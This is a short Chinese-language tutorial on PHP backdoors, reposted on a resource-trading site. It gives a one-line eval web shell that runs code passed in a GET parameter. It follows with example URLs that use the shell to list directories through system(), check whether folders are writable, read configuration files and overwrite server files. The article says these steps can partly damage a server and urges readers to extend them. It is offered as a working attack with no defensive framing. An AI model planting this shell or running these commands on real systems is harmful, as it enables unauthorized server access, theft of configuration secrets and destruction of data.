PHP后门的一些用法

【虚拟资源买卖网www.cnused.com】源码虚拟资源交易平台,免费开通VIP商户!
吆喝资源网官方客服QQ:787749153官方唯一QQ号码
文字广告位招租      好位置不等人!200元/月

今天我们说一些最常见的PHP留后门的一些用法

首先,写一个最简单的后门,也可以叫做木马。

<?php eval($_GET['evl']);

就这样,你已经获得了这台服务器上的很多执行权限。

那场景的用法有哪些呢?

打印服务器phpinfo

http://www.test.com/a.php?evl=phpinfo()

查看某个目录下有什么文件

http://www.test.com/a.php?evl=var_dump(system("ls /mnt/web/ -a"));

查看目录是否可写,接下里就可以在可写的目录里创建可执行文件了

http://www.test.com/a.php?evl=var_dump(is_writable("/mnt/web/abc/"));

获取某个文件的内容,一般用来读取配置

http://www.test.com/a.php?evl=var_dump(file_get_contents("/mnt/web/temp/api.php"));

对某个可写目录进行写文件

http://www.test.com/a.php?evl=var_dump(file_put_contents("/mnt/web/temp/api.php",file_get_contents("/mnt/web/script/test.php")));

好了,以上基本已经可以完成对一个服务器的查看的部分破坏了,其他的功能就试着举一反三吧。

以上就是PHP后门的一些用法的详细内容,更多请关注吆喝资源网其它相关文章!

本文转自PHP中文网,吆喝网(http://yaoohe.com)搜集整理,如有疑问请联系本站客服!

本文来源网络,其内容均为发表者提供,文章内容系作者个人观点,不代表本站对观点赞同或支持。如需有侵权,请在7日内联系本站客服进行处理,否则视为放弃追究权利,客服QQ:787749153,请注明。
1

发表评论